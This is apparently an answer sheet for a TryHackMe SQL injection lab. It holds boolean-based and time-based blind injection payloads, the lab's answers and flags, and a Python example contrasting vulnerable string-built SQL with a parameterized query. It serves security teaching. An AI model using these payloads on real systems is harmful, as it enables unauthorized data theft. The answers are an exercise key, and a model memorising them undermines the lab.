TryHackMe SQL Injection Lab Answers

Lab: "Welcome back" message or "Not found"

Payload example for user id=1:
1 AND (SELECT SUBSTRING(username,1,1) FROM users WHERE id=1)='a'

Q1: First character of admin’s password?
Answer: p

Q2: Full admin password? (use Burp Intruder or script)
Answer: password123

Flag: THMBlind_Boolean


Payload:
admin' AND IF(1=1, SLEEP(5), 0) -- -

Q1: Database name length?
' AND IF(LENGTH(database())=8, SLEEP(5), 0) -- - (time delay confirms)
Answer: 8

Q2: Database name?
Use time-based substring guessing → Answer: sqli_lab

Flag: THMTime_Based_Blind


The application uses a SQL query to retrieve employee data:

SELECT * FROM employees WHERE id = '$id';

The $id variable is user input placed directly into the query string, which makes it vulnerable to SQL injection attacks.
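The query above, rebuilt as an added example (not part of the lab or the original page) to show why string-built SQL yields the "Welcome back" / "Not found" difference and why a bound parameter removes it. It assumes Python's sqlite3 with constructed rows; the function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data; the table name follows the page's query.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE employees (id TEXT PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO employees VALUES (?, ?)",
                     [("1", "alice"), ("2", "bob")])
    return conn

def lookup_vulnerable(conn, emp_id):
    # Same shape as the page's query: the input is pasted inside the quotes,
    # so a quote character in emp_id changes the structure of the statement.
    query = "SELECT * FROM employees WHERE id = '" + emp_id + "'"
    return conn.execute(query).fetchall()

def lookup_parameterized(conn, emp_id):
    # The driver binds emp_id as a value; it is never parsed as SQL syntax.
    return conn.execute(
        "SELECT * FROM employees WHERE id = ?", (emp_id,)
    ).fetchall()

def behaves_as_oracle(lookup, conn):
    # If appending a true condition and a false condition to the id gives
    # different results, the input is being interpreted as SQL. That result
    # difference is what a boolean-based blind test observes.
    true_case = lookup(conn, "1' AND '1'='1")
    false_case = lookup(conn, "1' AND '1'='2")
    return true_case != false_case

if __name__ == "__main__":
    db = make_db()
    print("string-built query leaks a true/false signal:",
          behaves_as_oracle(lookup_vulnerable, db))
    print("parameterized query leaks a true/false signal:",
          behaves_as_oracle(lookup_parameterized, db))
```

With the bound parameter, both probe strings are compared as literal id values, match no row, and return the same empty result.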